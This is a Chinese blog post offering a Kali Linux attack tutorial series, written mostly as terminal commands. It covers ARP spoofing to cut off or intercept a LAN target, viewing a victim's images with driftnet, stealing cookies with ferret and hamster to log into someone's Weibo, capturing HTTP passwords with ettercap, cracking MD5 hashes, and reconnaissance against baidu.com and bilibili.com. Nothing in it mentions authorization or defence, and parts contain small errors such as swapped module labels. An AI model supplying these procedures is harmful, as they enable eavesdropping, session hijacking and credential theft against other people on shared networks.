哲学系老干部
文章16
标签13
分类4
kali linux渗透系列教程「停更」

kali linux渗透系列教程「停更」

Kali Linux 业界领先的渗透测试系统
教程每期都得看,一环套一环,一节看不懂你后面都都看不懂。

ARP断网攻击(1)

1.收集目标ip:可以查看网络是否正常 收集目标ip 网关 (同区域网网关一样)网卡

1
终端键入:ping www.baidu.com

2.目标ip查询

1
终端键入:nmap -sP 192.168.0.* 

代码含义:意思是在网络寻找所有在线主机。后面的ip复制你要攻击的目标ip即可。

3.网关获取 #在同一局域网内网关是一样,在本机cmd命令键入ipconfig即可查看

1
终端键入:ifconfig

代码含义:查看网卡
科普命令:clear #代码含义:清空当前页面

4.arp攻击命令

1
终端键入:arpspoof -i eth0 -t 192.168.1.100 192.168.1.1

代码含义:arpspoof -i(arp攻击命令)eth0 -t(网卡) 192.168.1.100(目标ip) 192.168.1.1(网关)
功能操作:按ctrl键+c,可以停止arp攻击

指定获取内网其它电脑相册(2)

到的工具drifthnet

1.流量转发

1
终端键入:echo 1 >/proc/sys/net/ipv4/ip_forward #

代码含义:流量转发命令,使目标在被arp攻击时也能上网

2.对目标进行ARP攻击

1
终端键入:arpspoof -i eth0 -t 192.168.1.100 192.168.1.1

代码含义:arpspoof -i(arp攻击命令)eth0 -t(网卡) 192.168.1.100(目标ip) 192.168.1.1(网关)

3.劫持目标电脑,正在浏览的图片

1
新建终端输入:driftnet -i eth0 

代码含义:目标机所浏览的图片会全部显示在里面 eth0是网卡

会话劫持(3)

效果:劫持局域网内目标ip所浏览的网页。
例如:目标登陆了新浪微博,那么我们劫持之后就可以登陆他的新浪微博就是抓取Cookies 。
用到的工具:
arpspoof
wireshark
hamster
不同的是我们需要在攻击他的时候让他上网,那么就需要转发一下流量:

收集信息 # ip 网关网卡

1
终端键入:echo 1 >/proc/sys/net/ipv4/ip_forward #

代码含义:流量转发命令arp攻击目标(不会的去看 1.ARP断网攻击)

然后新建一个终端

1
终端键入:输入wireshark

代码含义:wireshark是一个抓包工具

在wireshark内选择网卡点击开始,等2分钟后点击红色方块暂停点击File—-Save As… #保存到桌面 保存为 .pcap格式

暂停arp攻击 #如何暂停看1.ARP断网攻击
在终端输入:ferret -r 222.pcap #222.pcapng是你保存到桌面的那个文件名 你们输入的啥就填啥
终端输入:ls
终端输入:cd 桌面终端输入:ferret -t 222.pcap
终端输入:ferret -r 222.pcap桌面生成了一个txt文档打开会发现有很多目标ip网站地址,将txt文档移到kali—计算机—–root文件夹下终端输入:hamster现在修改浏览器ip和端口点击左边工具栏第一个图标像小熊进到浏览器找到最右边菜单点击—–点击齿轮那个图标—–点击Advanced—–Network—–settings…—–选择最后一个Manual…..—–填HTTP Proxy为127.0.0.1—-后面的prot填1234—-点击OK—– #3段横杠图标(有点电脑基础的都知道是设置吧)

在浏览器地址栏输入:127.0.0.1:1234 #127.0.0.1是前面设置的代理 1234是前面设置的端口打开后会看到目标ip我们点击 右边就出现了一堆网站 这些就是目标浏览的网站我们已经成功劫持随便点击去看吧QWQ

备注:有些人会发现打开好多网站都进不去 那是因为你抓包的时候没抓完就暂停导出弄来用了 最好抓个5分钟再暂停导出用

内网获取指定IP的HTTP帐号密码(4)

用到的工具
ettercap
HTTP是什么我就不多说了
1. 首先ARP欺骗

1
终端键入:echo 1 >/proc/sys/net/ipv4/ip_forward
1
终端键入:cat /proc/sys/net/ipv4/ip_forward

ARP攻击

1
bash终端键入:arpspoof -i eth0 -t 192.168.1.100 192.168.1.1

代码含义:arpspoof -i(arp攻击命令)eth0 -t(网卡) 192.168.1.100(目标ip) 192.168.1.1(网关)

1
新建终端键入:ettercap -Tq -i eth0

代码解释:-Tq也可以使用另一种方式 -T -q意思是启用文本模式来回显 eth0是网卡

利用findmyhash高效破解MD5加密密码(5)

用到的工具findmyhash

1
终端输入:findmyhash MD5 -h 202cb962ac59075b964b07152d234b70

代码作用:这个工具会调用一些破解MD5网站来破解,一个一个找网站破解多麻烦对吧QwQ 202cb962ac59075b964b07152d234b70这个就是MD5加密的密码

服务器枚举工具Amap的使用(6)

软件介绍:Amap是一个服务器枚举工具,使用这个工具可以识别正运行在一个指定端口或一个范围端口上的应用程序我就拿本机ip测试了
1. 查看ip

1
在cmd键入ipconfig

IP:192.168.1.100到kali系统测试在这里我演示在指定的在制定的50到200端口范围内,运行在192.168.1.110这个ip上面正在运行的

1
终端键入:amap -bq 192.168.1.110 1-1000

有些人会发现回复了

1
root@kali: amap -bq 192.168.1.100 1-1000 amap v5.4 (http://www.thc.org/thc-amap) started at 2015-09-05 13:28:34 - APPLICATION MAPPING mode 

这个样子就是你端口设置范围太小 我们设置大一些就行

1
Protocol on 192.167.1.110/tcp matches netbios-session - banner: 

代码作用:后面显示banner就是没软件运行,如果有显示一些程序名那就是运行的软件了

Recon-NG框架的介绍(7-上)

软件介绍:Recon-NG是由Python编写的一个开源web侦查(信息收集框架)
首次使用Recon-NG

1
2
执行命令:recon-ng
[default] >

看到这个就说明我们成功登陆了recon-ng框架

下面我们使用help命令查看所有的执行命令

1
终端键入:help

[71] Recon modules #侦查模块
[7] Reporting modules #报告模块
[2] Import modules #渗透攻击模块
[2] Exploitation modules #发现模块
[2] Discovery modules #导入模块
add Adds records to the database # 添加到数据库中添加记录
back Exits the current context #返回当前上下文
delete Deletes records from the database #删除从数据库中删除记录
exit Exits the framework #退出退出框架
help Displays this menu #帮助显示此菜单
keys Manages framework API keys #密钥管理框架
load Loads specified module #指定模块
pdb Starts a Python Debugger session #PDB启动Python调试器会话
query Queries the database #查询数据库
record Records commands to a resource file #记录到资源文件的命令
reload Reloads all modules #重新加载所有模块
resource Executes commands from a resource file #资源从资源文件中执行命令
search Searches available modules #搜索可用模块
set Sets module options #设置模块选项
shell Executes shell commands #外壳执行外壳命令
show Shows various framework items #显示各种框架项目
snapshots Manages workspace snapshots #快照管理工作区快照
spool Spools output to a file #阀芯轴输出到文件
unset Unsets module options #未设定模块选项
use Loads specified module #使用指定模块
workspaces Manages workspaces #工作区管理工作区
上面这些都是在recon-ng内使用的参数
可以使用show modules查看所有有效的模板列表 #输入后看到的5类就是上面说到的侦查模块,报告模块,渗透攻击模块,发现模块,导入模块。

利用Recon-NG框架检测baidu所有子域(7-下)

如果你入侵一个网站,入侵不进去,收集这些子站的信息可以入侵,然后进行跨站或者社工之类的操作。
1. 使用recon/domains-hosts/baidu_site模板

1
终端输入:use recon/domains-hosts/baidu_site
1
show options

代码功能:查看该模板下可配置的参数

1
终端输入:set SOURCE baidu.com
1
终端输入:run

代码作用:输入完可以看到它在慢慢举例,等举例完了,就可以使用终端输入 位置/test.txt 保存 #位置填要保存的位置例如桌面

域名查询工具DMitry的使用(8)

工具介绍:使用域名查询工具DMitry,可以用来查询ip,域名,whios信息盘
测试网站:http://www.bilibili.com

1
终端输入:dmitry -wnpb bilibili.com

Referral URL: http://www.name.com #这个就是B站的注册商
Name Server: NS1.HDSLB.NET #这个是B站所用的DNS
Creation Date: 21-oct-2004 #这个是域名注册时间Expiration Date: 21-oct-2020 #这个是域名到期时间剩下的用谷歌翻译看就知道我就不一一解说了

本文作者:哲学系老干部
本文链接:https://steinsgate.link/2016/12/02/20161202/
版权声明:本文采用 CC BY-NC-SA 3.0 CN 协议进行许可
×